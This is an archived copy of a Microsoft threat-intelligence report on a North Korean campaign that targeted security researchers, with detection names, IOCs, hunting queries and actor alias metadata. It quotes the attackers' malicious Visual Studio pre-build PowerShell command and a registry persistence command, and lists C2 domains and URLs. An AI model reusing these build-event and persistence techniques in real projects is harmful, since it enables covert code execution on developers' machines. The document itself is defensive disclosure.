{
	"id": "8ec6b543-e7d3-4c4a-ae86-4c6fa4be10c1",
	"created_at": "2026-04-06T01:30:55.656429Z",
	"updated_at": "2026-04-10T03:38:19.782058Z",
	"deleted_at": null,
	"sha1_hash": "dddfee5671f3436a8a1a59845e4983c3453df15b",
	"title": "ZINC attacks against security researchers",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 428202,
	"plain_text": "ZINC attacks against security researchers\r\nBy Microsoft Threat Intelligence\r\nPublished: 2021-01-28 · Archived: 2026-04-06 00:28:34 UTC\r\nApril 2023 update – Microsoft Threat Intelligence has shifted to a new threat actor naming taxonomy aligned\r\naround the theme of weather. Zinc is now tracked as Diamond Sleet.\r\nTo learn about how the new taxonomy represents the origin, unique traits, and impact of threat actors, and to get a\r\ncomplete mapping of threat actor names, read this blog: Microsoft shifts to a new threat actor naming\r\ntaxonomy.\r\nIn recent months, Microsoft has detected cyberattacks targeting security researchers by an actor we track as ZINC.\r\nThe campaign originally came to our attention after Microsoft Defender for Endpoint detected an attack in\r\nprogress. Observed targeting includes pen testers, private offensive security researchers, and employees at security\r\nand tech companies. Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence\r\nto ZINC, a DPRK-affiliated and state-sponsored group, based on observed tradecraft, infrastructure, malware\r\npatterns, and account affiliations.\r\nThis ongoing campaign was reported by Google’s Threat Analysis Group (TAG) earlier this week, capturing the\r\nbrowser-facing impact of this attack. 
By sharing additional details of the attack, we hope to raise awareness in the\r\ncybersecurity community about additional techniques used in this campaign and serve as a reminder to security\r\nprofessionals that they are high-value targets for attackers.\r\nWe also want to thank our industry colleagues at Twitter and GitHub for their collaboration in this investigation\r\nand rapid actions to suspend the malicious accounts targeting the security community and our mutual customers.\r\nWe are sharing this information with the community as part of our mission to shine a light on bad actors and\r\nelevate awareness of low-profile tactics and techniques that easily fly under the radar of security operations\r\ncenters (SOCs) or security professionals and are easily overlooked as low-level alerts or benign chatter. The\r\nrelated IoCs and Microsoft Defender for Endpoint product detections we share in this blog will help SOCs\r\nproactively hunt for related activity in their environments and elevate any low-level alerts for remediation. ZINC\r\nused a variety of new techniques to target the victims, including gaining credibility on social media with genuine\r\ncontent, sending malicious Visual Studio projects, and using a watering hole website weaponized with browser\r\nexploits.\r\nTechnical details\r\nIn mid-2020, ZINC started building a reputation in the security research community on Twitter by retweeting high-\r\nquality security content and posting about exploit research from an actor-controlled blog. Throughout the lifetime\r\nof the campaign, the actor operated several accounts that accounted for roughly 2,000 followers, including many\r\nprominent security researchers.\r\nhttps://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/\r\nPage 1 of 15\n\nIn the image below, one of the actor-controlled Twitter accounts retweets another of their accounts to amplify their\r\nown posts. 
The posts from the actors received a reasonable amount of attention, usually accumulating several\r\nhundred likes or retweets.\r\nFigure 1. Actor-controlled Twitter handles\r\nAfter building their reputation across their established social media accounts, the actors started approaching\r\npotential targets on social media platforms such as Twitter and LinkedIn. The conversations were often seemingly\r\ninnocuous, asking security questions or talking about exploit techniques. If the researcher was responsive, the\r\nactor would offer to move communication to another platform (e.g., email, Discord), in some cases to then send\r\nfiles using encrypted or PGP-protected ZIPs.\r\nZINC also used their Twitter accounts to post links to a security blog they owned (br0vvnn[.]io). These links were\r\nalso shared by many others in the security community on Twitter and other social media platforms, further\r\ndeepening trust for the owner and content.\r\nA blog post titled DOS2RCE: A New Technique To Exploit V8 NULL Pointer Dereference Bug was shared by the\r\nactor on October 14, 2020 from Twitter. From October 19-21, 2020, some researchers, who hadn’t been contacted\r\nor sent any files by ZINC profiles, clicked the links while using the Chrome browser, resulting in known ZINC\r\nmalware on their machines soon after. This suggests that a Chrome browser exploit chain was likely hosted on the\r\nblog, although we haven’t been able to prove this. Since some of the victims’ browsers were fully patched, it’s\r\nalso suspected, but unproven, that the exploit chain used 0-day or patch gap exploits. We believe that not all\r\nvisitors to the site were compromised, even during the dates listed above.\r\nMalicious Visual Studio project\r\nSome of the files sent by ZINC to researchers were malicious Visual Studio projects that included prebuilt\r\nbinaries. One of the binaries used the well-known name Browse.vc.db but was a malicious DLL rather than a\r\ndatabase file. 
Microsoft Defender for Endpoint detects these DLLs as Comebacker malware. A pre-build event\r\nwith a PowerShell command was used to launch Comebacker via rundll32. This use of a malicious pre-build event\r\nis an innovative technique to gain execution.\r\nAn example of the PowerShell in the pre-build event can be seen here:\r\n\u003cprebuildevent\u003e\r\n\u003ccommand\u003epowershell -executionpolicy bypass -windowstyle hidden\r\nif(([system.environment]::osversion.version.major -eq 10) -and\r\n[system.environment]::is64bitoperatingsystem -and (Test-Path x64\\Debug\\Browse.VC.db)){rundll32\r\nx64\\Debug\\Browse.VC.db,ENGINE_get_RAND 7am1cKZAEb9Nl1pL 4201 }\u003c/command\u003e\r\n\u003c/prebuildevent\u003e\r\nPre-build events are stored in the .vcxproj file in Visual Studio solutions. The page How to: Use Build Events in\r\nMSBuild Projects has a list of other build events and example XML for the events. It would also be possible to\r\nabuse a custom build step in the same way.\r\nAnalyzing Comebacker DLLs\r\nOnce the malicious Visual Studio Project file was built, the process\r\ndrops C:\\ProgramData\\VirtualBox\\update.bin and adds the file to an autostart registry key. Update.bin (SHA-256: 25d8ae46…) is a different 64-bit DLL file embedded inside Browse.VC.db.\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SSL Update\r\n“C:\\Windows\\System32\\rundll32.exe C:\\ProgramData\\VirtualBox\\update.bin,ASN2_TYPE_new\r\n5I9YjCZ0xlV45Ui8 2907”\r\nThe actors put some effort into modifying the Comebacker malware attributes between deployments; file names,\r\nfile paths and exported functions were regularly changed, so these static IOCs can’t be solely relied upon for\r\ndependable detection. We were first alerted to the attack when Microsoft Defender for Endpoint detected the\r\nComebacker DLL attempting to perform process privilege escalation. 
See the Microsoft Defender for Endpoint\r\ndetections section for a full process chain of the attack.\r\nKlackring malware\r\nKlackring is a DLL that registers a malicious service on the targeted machine. It was deployed to victims either by\r\nthe Comebacker malware or an unknown dropper. The DLL was dropped to C:\\Windows\\system32 and saved with\r\nthe .sys file extension.\r\nMHTML file\r\nIn addition to the social engineering attacks via social media platforms, we observed that ZINC sent researchers a\r\ncopy of a br0vvnn blog page saved as an MHTML file with instructions to open it with Internet Explorer. The\r\nMHTML file contained some obfuscated JavaScript that called out to a ZINC-controlled domain for further\r\nJavaScript to execute. The site was down at the time of investigation and we have not been able to retrieve the\r\npayload for further analysis.\r\nDriver abuse\r\nIn one instance, we discovered the actor had downloaded an old version of the Viraglt64.sys driver from the Vir.IT\r\neXplorer antivirus. The file was dropped to the victim system as C:\\Windows\\System32\\drivers\\circlassio.sys. The\r\nactor then attempted to exploit CVE-2017-16238, described by the finder here, where the driver doesn’t perform\r\nadequate checking on a buffer it receives, which can be abused to gain an arbitrary kernel write primitive. The\r\nactor’s code, however, appears to be buggy: when attempting to exploit the vulnerability, the exploit tried to\r\noverwrite some of the driver’s own code, which crashed the victim’s machine.\r\nOther malware\r\nOther tools used included an encrypted Chrome password-stealer hosted on the ZINC\r\ndomain https://codevexillium[.]org. The host DLL (SHA-256: ada7e80c…) was downloaded to the\r\npath C:\\ProgramData\\USOShared\\USOShared.bin using PowerShell and then run via rundll32. 
This malware is a\r\nweaponized version of CryptLib, and it decrypted the Chrome password stealer (SHA-256: 9fd0506…), which it\r\ndropped to C:\\ProgramData\\USOShared\\USOShared.dat.\r\nC2 communication\r\nAfter establishing a command-and-control (C2) channel on a targeted device, the backdoor is configured to check\r\ninto the C2 servers every 60 seconds. Over this C2 channel, the threat actors can execute remote commands to\r\nenumerate files/directories and running processes, and to collect/upload information about the target device,\r\nincluding IP address, computer name, and NetBIOS name. Furthermore, we observed some hands-on-keyboard action\r\nto enumerate all files/directories on the target disk, create screenshots, and deploy additional modules.\r\nMicrosoft Defender for Endpoint detections\r\nWhen malware is run from a malicious Visual Studio project, the following alerts and process tree are generated\r\nby Microsoft Defender for Endpoint. Multiple alerts, including “Use of living-off-land binary to run malware” and\r\n“Process Privilege escalation”, were triggered on the execution of Browse.VC.db and update.bin.\r\nMicrosoft Defender for Endpoint has comprehensive detection coverage for this campaign. These detections raise\r\nalerts that inform security operations teams about the presence of activities and artifacts from the attacks. Security\r\noperations and incident response teams can use investigation and remediation tools in Microsoft Defender for\r\nEndpoint to perform deep investigation and additional hunting.\r\nFigure 2. Alert raised by Microsoft Defender for Endpoint on ComeBacker\r\nFigure 3. 
Alert raised by Microsoft Defender for Endpoint on low-reputation arbitrary code executed by signed\r\nexecutable\r\nRecommended actions and preventative measures\r\nIf you visited the referenced ZINC-owned blog (br0vvnn[.]io), you should immediately run a full antimalware\r\nscan and use the provided IOCs to check your systems for intrusion. If a scan or a search for the IOCs finds any\r\nrelated malware on your systems, you should assume full compromise and rebuild. Microsoft assesses that\r\nsecurity research was the likely objective of the attack, and any information on the affected machine may be\r\ncompromised.\r\nFor proactive prevention of this type of attack, it is recommended that security professionals use an isolated\r\nenvironment (e.g., a virtual machine) for building untrusted projects in Visual Studio or opening any links or files\r\nsent by unknown parties.\r\nAssociated indicators of compromise (IOCs)\r\nThe below list provides IOCs observed during this activity. 
We encourage our customers to implement detections\r\nand protections to identify possible prior campaigns or prevent future campaigns against their systems.\r\nAzure Sentinel customers can find a Sentinel query containing these indicators in this GitHub\r\nrepo: https://github.com/Azure/Azure-Sentinel/tree/master/Detections/MultipleDataSources/ZincJan272021IOCs.yaml\r\nMicrosoft 365 Defender customers can find related hunting queries below or at this GitHub\r\nrepo: https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/\r\nMicrosoft Defender for Endpoint detections for malware\r\nBackdoor:Script/ComebackerCompile.A!dha\r\nTrojan:Win64/Comebacker.A!dha\r\nTrojan:Win64/Comebacker.A.gen!dha\r\nTrojan:Win64/Comebacker.B.gen!dha\r\nTrojan:Win32/Comebacker.C.gen!dha\r\nTrojan:Win32/Klackring.A!dha\r\nTrojan:Win32/Klackring.B!dha\r\nActor-controlled Twitter Handles\r\nhttps://twitter.com/z055g\r\nhttps://twitter.com/james0x40\r\nhttps://twitter.com/mvp4p3r\r\nhttps://twitter.com/dev0exp\r\nhttps://twitter.com/BrownSec3Labs\r\nhttps://twitter.com/br0vvnn\r\nhttps://twitter.com/0xDaria\r\nActor-controlled LinkedIn profiles\r\nhttps://www.linkedin.com/in/james-williamson-55a9b81a6/\r\nhttps://www.linkedin.com/in/guo-zhang-b152721bb/\r\nhttps://www.linkedin.com/in/linshuang-li-aa69391bb/\r\nActor-controlled GitHub Accounts\r\nFurther investigation revealed a number of GitHub accounts with names matching the Twitter handles published\r\nby Google:\r\nhttps://github.com/br0vvnn\r\nhttps://github.com/dev0exp\r\nhttps://github.com/henya290\r\nhttps://github.com/james0x40\r\nhttps://github.com/tjrim91\r\nActor-controlled blog URLs\r\nhttps://br0vvnn[.]io\r\nhttps://blog.br0vvnn[.]io\r\nActor-controlled C2 domains\r\ncodevexillium[.]org\r\nangeldonationblog[.]com\r\ninvestbooking[.]de\r\nkrakenfolio[.]com\r\nLikely legitimate but compromised websites used 
as C2\r\nwww.dronerc[.]it\r\nwww.edujikim[.]com\r\nwww.fabioluciani[.]com\r\ntrophylab[.]com\r\nforums.joycity[.]com\r\nMarcodetech[.]net\r\nLinelcssplugin[.]org\r\nC2 URLs\r\nhttps://codevexillium[.]org/image/download/download.asp\r\nhttps://angeldonationblog[.]com/image/upload/upload.php\r\nhttps://www.dronerc[.]it/shop_testbr/Core/upload.php\r\nhttps://www.dronerc[.]it/forum/uploads/index.php\r\nhttps://www.dronerc[.]it/shop_testbr/upload/upload.php\r\nhttps://www.edujikim[.]com/intro/blue/insert.asp\r\nhttps://investbooking[.]de/upload/upload.asp\r\nMalware hashes\r\nThe SHA-256 hashes for the malicious .vcxproj files, the Comebacker and Klackring malware, the vulnerable driver, and other related tools are listed by category in the file-hash hunting query under Advanced hunting queries below.\r\nMalicious Visual Studio .vcxproj files\r\nComebacker malware\r\nKlackring malware\r\nviaglt64.sys – Vulnerable Vir.IT driver for CVE-2017-16238\r\n58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495\r\nOther malware and tools\r\nThese are hashes of files we believe to be related to the attack but aren’t Comebacker or Klackring malware.\r\nThis list includes some hashes where we haven’t been able to retrieve a sample but based on the file usage or\r\nlocation looks likely to be related.\r\nHost IOCs\r\nComebacker Visual Studio Project file execution\r\nRundll32.exe dxgkrnl_poc.vcxproj.suo,CMS_dataFinal Bx9yb37GEcJNK6bt 4231\r\nComebacker file names and exported function name\r\nNote that the file name was often changed and these names shouldn’t be considered a definitive 
list:\r\nBrowse.vc.db,ENGINE_get_RAND\r\nNVIDIA.bin,SSL_HandShaking\r\nadobe.bin,SSL_HandShaking\r\nUSOShared.bin,ntWindowsProc\r\nupdate.dat,SetWebFilterString\r\nupdate.bin,CleanupBrokerString\r\nntuser.db,glInitSampler\r\nRdrCEF.bin,json_object_get_unicode_string\r\nupdate.bin,ASN2_TYPE_new\r\nUSO.DAT,deflateSuffix\r\nUSO.DAT,cmsSetLogHandlerTHR\r\nUSO.DAT,sql_blob_open\r\nlocaldb.db,ntSystemInfo\r\nRegistry Key\r\nHKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SSL Update\r\nFile path\r\nKlackring\r\nThis malware was deployed as a .sys file in C:\\windows\\system32\\\r\nC:\\Windows\\System32\\helpsvc.sys\r\nC:\\Windows\\System32\\Irmon.sys\r\nC:\\Windows\\System32\\LogonHours.sys\r\nC:\\Windows\\System32\\Ntmssvc.sys\r\nC:\\Windows\\System32\\NWCWorkstation.sys\r\nC:\\Windows\\System32\\Nwsapagent.sys\r\nC:\\Windows\\System32\\PCAudit.sys\r\nC:\\Windows\\System32\\uploadmgr.sys\r\nGeneric folders and file paths for malware and tooling\r\nThese are folders and file paths that have been used by ZINC for malware and tools but may be used by other\r\nactors or produce false positives.\r\nLook for .bin, .db, .dat, and .cpl files in the following folders; USOShared was the one most used across victims:\r\nC:\\ProgramData\\USOShared\\\r\nC:\\ProgramData\\Adobe\\\r\nC:\\ProgramData\\Mozilla\\\r\nC:\\ProgramData\\NVIDIA\\\r\nC:\\ProgramData\\Oracle\\\r\nC:\\ProgramData\\VirtualBox\\\r\nCheck these file paths for additional malware and 
tooling:\r\nC:\\MSCache\\msomui.dat\r\nC:\\MSCache\\local.cpl\r\nC:\\ProgramData\\ntuser.db\r\nC:\\ProgramData\\ntuser.ini\r\nC:\\ProgramData\\taskhost.exe\r\nC:\\ProgramData\\Adobe\\get.exe\r\nC:\\ProgramData\\Adobe\\ARM\\AdobeUpdate.exe\r\nC:\\ProgramData\\Mozilla\\update.bin\r\nC:\\ProgramData\\NVIDIA\\graphicscheck.exe\r\nC:\\ProgramData\\NVIDIA\\NVIDIA.bin\r\nC:\\ProgramData\\Oracle\\java.db\r\nC:\\ProgramData\\Oracle\\java.cpl\r\nC:\\ProgramData\\USOShared\\Search.bin\r\nC:\\Windows\\netsvc.exe\r\nC:\\Windows\\system32\\kjchost.dll\r\nC:\\Windows\\System32\\traextapi.dll\r\nC:\\Windows\\System32\\healthextapi.dll\r\nC:\\Windows\\System32\\detaextapi.dll\r\nC:\\Windows\\Temp\\ads.tmp\r\nC:\\windows\\Temp\\CA_Root.pfx\r\nC:\\Recovery\\recover.bin\r\nC:\\Recovery\\re.bin\r\nAdvanced hunting queries\r\nTo locate possible exploitation activity related to the contents of this blog, you can run the following advanced\r\nhunting queries via Microsoft Defender for Endpoint:\r\nCommand and control\r\nLook for the backdoor establishing network connections to command and control. Run the query in Microsoft Defender\r\nfor Endpoint\r\nDeviceNetworkEvents\r\n| where RemoteUrl in~('codevexillium.org',\r\n'angeldonationblog.com',\r\n'investbooking.de',\r\n'krakenfolio.com')\r\nExecution\r\nLook for PowerShell launched from MSBUILD with the related commands. Run the query in Microsoft Defender for\r\nEndpoint\r\nDeviceProcessEvents\r\n| where FileName =~ \"powershell.exe\"\r\n| where ProcessCommandLine has \"is64bitoperatingsystem\"\r\nand ProcessCommandLine has \"Debug\\\\Browse\"\r\nMalicious files\r\nLook for the presence of malicious files related to this threat. 
Run the below query in Microsoft Defender for\r\nEndpoint\r\nDeviceFileEvents\r\n| where SHA256 in~(\r\n// Malicious Visual Studio .vcxproj files\r\n'0ac5c8ad0c2ddef4d41724acac586ffabcc92ab9d4906a4fc4a1ff2ec2feec7c',\r\n'1cc60cb1e08779ff140dfbb4358a7c2587ba58ad2f1f23343b9efb51bb25aaed',\r\n'5024f199836692fe428aef3d41a561448632e9cbab954f842ef300573600423d',\r\n'98a6e0c8b8ec4dbbc3ef21308ec04912fa38e84828cedad99e081d588811ba5e',\r\n'd02752aadc71fafa950a6a51b1298dc914e81d20f95a86b12ee07cd2d2a85711',\r\n// Comebacker Malware\r\n'0acf21fba2b46ad2dd9c0da887f0fda704e7a5569b735c288d43a57688eb53fa',\r\n'133280e985448a3cfa8906830af137634c4657740a8c7209a368c5a0d0b3dabf',\r\n'25d8ae4678c37251e7ffbaeddc252ae2530ef23f66e4c856d98ef60f399fa3dc',\r\n'284df008aa2459fd1e69b1b1c54fb64c534fce86d2704c4d4cc95d72e8c11d6f',\r\n'34e13e2efb336fbe8202ca931a496aa451cf554450806b63d25a57a627e0fb65',\r\n'39ad9ae3780c2f6d41b1897e78f2b2b6d549365f5f024bc68d1fe794b940f9f1',\r\n'4c3499f3cc4a4fdc7e67417e055891c78540282dccc57e37a01167dfe351b244',\r\n'68e6b9d71c727545095ea6376940027b61734af5c710b2985a628131e47c6af7',\r\n'80a19caf4cfc9717d449975f98a157d0a483bf48a05e3b6f7a9b204faa8c35d1',\r\n'88aeaff0d989db824d6e9429cd94bc22bbbfc39775c0929e703343798f69e9cc',\r\n'913871432989378a042f5023351c2fa2c2f43b497b75ef2a5fd16d65aa7d0f54',\r\n'ca48fa63bd603c74ab02841fc6b6e90c29a9b740232628fadafa923d2833a314',\r\n'd0678fe8c92912698c4b9d4d03d83131e16d8b219ccf373fa847da476788785b',\r\n'5815103140c68614fd7fc05bad540e654a37b81b7e451e213128f2eff081005a',\r\n'e413e8094d76061f094f8b9339d00d80514065f7d37c184543c0f80c5d51bd80',\r\n'c23f50c8014c190afa14b4c2c9b85512fb3a75405652c9b6be1401f678295f36',\r\n'a75886b016d84c3eaacaf01a3c61e04953a7a3adf38acf77a4a2e3a8f544f855',\r\n// Klackring 
Malware\r\n'0acf21fba2b46ad2dd9c0da887f0fda704e7a5569b735c288d43a57688eb53fa',\r\n'16ad21aedf8f43fcedaa19dbd4f4fda0f3fec0517662b99a3054dac6542ab865',\r\n'1d9a58bc9b6b22fb3e3099996dbab13bfc5258b8307026f66fa69729d40f2b13',\r\n'4bfeb22ec438cf7ed8a7fefe6e7f321d842ad6ade0ca772732d1a757177e7ad7',\r\n'6b3a693d391426182fc2944d14b0816cdf1e5f87c13d6eb697756f9577b0bcee',\r\n'70e1f774c0c80e988641d709d3a6990193e039b1ce618ceaacc1d61a850e9b76',\r\n'77a9a0f67d09cafaf05ee090483a64622a7a04dfe226763f68651b071c1802f2',\r\n'8d85e31de2623538a42a211e3919d5602f99dc80f21e0c5f99d53838b2b07063',\r\n'90b4bd609b84c41beeed5b9310f2d84de83c74aaecfd1facc02e278be5059110',\r\n'9c90bbe4b61136d94170e90c299adab0d1ccbc3a8f71519799dd901d742f3561',\r\n'9f23069f74d0fb09823ad7f46f338d7920a731622404a7754df36ffbc40f8744',\r\n'a1c4c617d99d10bbb2524b4d5bfdcf00f47d9cf39e8c7d3e6a9ce1219393da5a',\r\n'a4fb20b15efd72f983f0fb3325c0352d8a266a69bb5f6ca2eba0556c3e00bd15',\r\n'aa5264323755a7dfa7c39ada09224c8c1de03ec8aeb6f7b216a56e8475e5f547',\r\n'aeb6fb0ba6d947b4ee67a5111fbdf798c4488377ae28bdf537c1f920a58785b7',\r\n'b47969e73931546fdcfb1e69c43da911dc9f7bb8d0e211731a253b572ecdc4fe',\r\n'bc19a9415428973d65358291d604d96a0915a01d4b06939269b9e210f23aad43',\r\n'c5d13324100047d7def82eeafdb6fc98cc2ccfae56db66ada9f1c3c7429ef9cb',\r\n'dcc986c48c9c99c012ae2b314ac3f2223e217aee2ccdfb733cbbdaea0b713589',\r\n'e8cf9b04ba7054e1c34bda05106478f9071f8f6569b4822070834abbf8e07a95',\r\n'b32319da446dcf83378ab714f5ad0229dff43c9c6b345b69f1a397c951c1122e',\r\n'11fef660dec27474c0c6c856a7b4619155821fdd1ce404848513a2700be806a5',\r\n'9e562cc5c3eb48a5f1a1ccd29bf4b2ff4ab946f45aa5d8ea170f69104b684023',\r\n// viaglt64.sys – Vulnerable Vir.IT driver for CVE-2017-16238\r\n'58a74dceb2022cd8a358b92acd1b48a5e01c524c3b0195d7033e4bd55eff4495',\r\n// Other potentially related malware and 
tools\r\n'e0e59bfc22876c170af65dcbf19f744ae560cc43b720b23b9d248f4505c02f3e',\r\n'3d3195697521973efe0097a320cbce0f0f98d29d50e044f4505e1fbc043e8cf9',\r\n'0a2d81164d524be7022ba8fd4e1e8e01bfd65407148569d172e2171b5cd76cd4',\r\n'96d7a93f6691303d39a9cc270b8814151dfec5683e12094537fd580afdf2e5fe',\r\n'dc4cf164635db06b2a0b62d313dbd186350bca6fc88438617411a68df13ec83c',\r\n'46efd5179e43c9cbf07dcec22ce0d5527e2402655aee3afc016e5c260650284a',\r\n'95e42a94d4df1e7e472998f43b9879eb34aaa93f3705d7d3ef9e3b97349d7008',\r\n'9d5320e883264a80ea214077f44b1d4b22155446ad5083f4b27d2ab5bd127ef5',\r\n'9fd05063ad203581a126232ac68027ca731290d17bd43b5d3311e8153c893fe3',\r\n'ada7e80c9d09f3efb39b729af238fcdf375383caaf0e9e0aed303931dc73b720',\r\n'edb1597789c7ed784b85367a36440bf05267ac786efe5a4044ec23e490864cee',\r\n'33665ce1157ddb7cd7e905e3356b39245dfba17b7a658bdbf02b6968656b9998',\r\n'3ab770458577eb72bd6239fe97c35e7eb8816bce5a4b47da7bd0382622854f7c',\r\n'b630ad8ffa11003693ce8431d2f1c6b8b126cd32b657a4bfa9c0dbe70b007d6c',\r\n'53f3e55c1217dafb8801af7087e7d68b605e2b6dde6368fceea14496c8a9f3e5',\r\n'99c95b5272c5b11093eed3ef2272e304b7a9311a22ff78caeb91632211fcb777',\r\n'f21abadef52b4dbd01ad330efb28ef50f8205f57916a26daf5de02249c0f24ef',\r\n'2cbdea62e26d06080d114bbd922d6368807d7c6b950b1421d0aa030eca7e85da',\r\n'079659fac6bd9a1ce28384e7e3a465be4380acade3b4a4a4f0e67fd0260e9447')\r\nSource: https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://www.microsoft.com/security/blog/2021/01/28/zinc-attacks-against-security-researchers/"
	],
	"report_names": [
		"zinc-attacks-against-security-researchers"
	],
	"threat_actors": [
		{
			"id": "34eea331-d052-4096-ae03-a22f1d090bd4",
			"created_at": "2025-08-07T02:03:25.073494Z",
			"updated_at": "2026-04-10T02:00:03.709243Z",
			"deleted_at": null,
			"main_name": "NICKEL ACADEMY",
			"aliases": [
				"ATK3 ",
				"Black Artemis ",
				"COVELLITE ",
				"CTG-2460 ",
				"Citrine Sleet ",
				"Diamond Sleet ",
				"Guardians of Peace",
				"HIDDEN COBRA ",
				"High Anonymous",
				"Labyrinth Chollima ",
				"Lazarus Group ",
				"NNPT Group",
				"New Romanic Cyber Army Team",
				"Temp.Hermit ",
				"UNC577 ",
				"Who Am I?",
				"Whois Team",
				"ZINC "
			],
			"source_name": "Secureworks:NICKEL ACADEMY",
			"tools": [
				"Destover",
				"KorHigh",
				"Volgmer"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "a2b92056-9378-4749-926b-7e10c4500dac",
			"created_at": "2023-01-06T13:46:38.430595Z",
			"updated_at": "2026-04-10T02:00:02.971571Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Operation DarkSeoul",
				"Bureau 121",
				"Group 77",
				"APT38",
				"NICKEL GLADSTONE",
				"G0082",
				"COPERNICIUM",
				"Moonstone Sleet",
				"Operation GhostSecret",
				"APT 38",
				"Appleworm",
				"Unit 121",
				"ATK3",
				"G0032",
				"ATK117",
				"NewRomanic Cyber Army Team",
				"Nickel Academy",
				"Sapphire Sleet",
				"Lazarus group",
				"Hastati Group",
				"Subgroup: Bluenoroff",
				"Operation Troy",
				"Black Artemis",
				"Dark Seoul",
				"Andariel",
				"Labyrinth Chollima",
				"Operation AppleJeus",
				"COVELLITE",
				"Citrine Sleet",
				"DEV-0139",
				"DEV-1222",
				"Hidden Cobra",
				"Bluenoroff",
				"Stardust Chollima",
				"Whois Hacking Team",
				"Diamond Sleet",
				"TA404",
				"BeagleBoyz",
				"APT-C-26"
			],
			"source_name": "MISPGALAXY:Lazarus Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "32a223a8-3c79-4146-87c5-8557d38662ae",
			"created_at": "2022-10-25T15:50:23.703698Z",
			"updated_at": "2026-04-10T02:00:05.261989Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"Lazarus Group",
				"Labyrinth Chollima",
				"HIDDEN COBRA",
				"Guardians of Peace",
				"NICKEL ACADEMY",
				"Diamond Sleet"
			],
			"source_name": "MITRE:Lazarus Group",
			"tools": [
				"RawDisk",
				"Proxysvc",
				"BADCALL",
				"FALLCHILL",
				"WannaCry",
				"MagicRAT",
				"HOPLIGHT",
				"TYPEFRAME",
				"Dtrack",
				"HotCroissant",
				"HARDRAIN",
				"Dacls",
				"KEYMARBLE",
				"TAINTEDSCRIBE",
				"AuditCred",
				"netsh",
				"ECCENTRICBANDWAGON",
				"AppleJeus",
				"BLINDINGCAN",
				"ThreatNeedle",
				"Volgmer",
				"Cryptoistic",
				"RATANKBA",
				"Bankshot"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "f32df445-9fb4-4234-99e0-3561f6498e4e",
			"created_at": "2022-10-25T16:07:23.756373Z",
			"updated_at": "2026-04-10T02:00:04.739611Z",
			"deleted_at": null,
			"main_name": "Lazarus Group",
			"aliases": [
				"APT-C-26",
				"ATK 3",
				"Appleworm",
				"Citrine Sleet",
				"DEV-0139",
				"Diamond Sleet",
				"G0032",
				"Gleaming Pisces",
				"Gods Apostles",
				"Gods Disciples",
				"Group 77",
				"Guardians of Peace",
				"Hastati Group",
				"Hidden Cobra",
				"ITG03",
				"Jade Sleet",
				"Labyrinth Chollima",
				"Lazarus Group",
				"NewRomanic Cyber Army Team",
				"Operation 99",
				"Operation AppleJeus",
				"Operation AppleJeus sequel",
				"Operation Blockbuster: Breach of Sony Pictures Entertainment",
				"Operation CryptoCore",
				"Operation Dream Job",
				"Operation Dream Magic",
				"Operation Flame",
				"Operation GhostSecret",
				"Operation In(ter)caption",
				"Operation LolZarus",
				"Operation Marstech Mayhem",
				"Operation No Pineapple!",
				"Operation North Star",
				"Operation Phantom Circuit",
				"Operation Sharpshooter",
				"Operation SyncHole",
				"Operation Ten Days of Rain / DarkSeoul",
				"Operation Troy",
				"SectorA01",
				"Slow Pisces",
				"TA404",
				"TraderTraitor",
				"UNC2970",
				"UNC4034",
				"UNC4736",
				"UNC4899",
				"UNC577",
				"Whois Hacking Team"
			],
			"source_name": "ETDA:Lazarus Group",
			"tools": [
				"3CX Backdoor",
				"3Rat Client",
				"3proxy",
				"AIRDRY",
				"ARTFULPIE",
				"ATMDtrack",
				"AlphaNC",
				"Alreay",
				"Andaratm",
				"AngryRebel",
				"AppleJeus",
				"Aryan",
				"AuditCred",
				"BADCALL",
				"BISTROMATH",
				"BLINDINGCAN",
				"BTC Changer",
				"BUFFETLINE",
				"BanSwift",
				"Bankshot",
				"Bitrep",
				"Bitsran",
				"BlindToad",
				"Bookcode",
				"BootWreck",
				"BottomLoader",
				"Brambul",
				"BravoNC",
				"Breut",
				"COLDCAT",
				"COPPERHEDGE",
				"CROWDEDFLOUNDER",
				"Castov",
				"CheeseTray",
				"CleanToad",
				"ClientTraficForwarder",
				"CollectionRAT",
				"Concealment Troy",
				"Contopee",
				"CookieTime",
				"Cyruslish",
				"DAVESHELL",
				"DBLL Dropper",
				"DLRAT",
				"DRATzarus",
				"DRATzarus RAT",
				"Dacls",
				"Dacls RAT",
				"DarkComet",
				"DarkKomet",
				"DeltaCharlie",
				"DeltaNC",
				"Dembr",
				"Destover",
				"DoublePulsar",
				"Dozer",
				"Dtrack",
				"Duuzer",
				"DyePack",
				"ECCENTRICBANDWAGON",
				"ELECTRICFISH",
				"Escad",
				"EternalBlue",
				"FALLCHILL",
				"FYNLOS",
				"FallChill RAT",
				"Farfli",
				"Fimlis",
				"FoggyBrass",
				"FudModule",
				"Fynloski",
				"Gh0st RAT",
				"Ghost RAT",
				"Gopuram",
				"HARDRAIN",
				"HIDDEN COBRA RAT/Worm",
				"HLOADER",
				"HOOKSHOT",
				"HOPLIGHT",
				"HOTCROISSANT",
				"HOTWAX",
				"HTTP Troy",
				"Hawup",
				"Hawup RAT",
				"Hermes",
				"HotCroissant",
				"HotelAlfa",
				"Hotwax",
				"HtDnDownLoader",
				"Http Dr0pper",
				"ICONICSTEALER",
				"Joanap",
				"Jokra",
				"KANDYKORN",
				"KEYMARBLE",
				"Kaos",
				"KillDisk",
				"KillMBR",
				"Koredos",
				"Krademok",
				"LIGHTSHIFT",
				"LIGHTSHOW",
				"LOLBAS",
				"LOLBins",
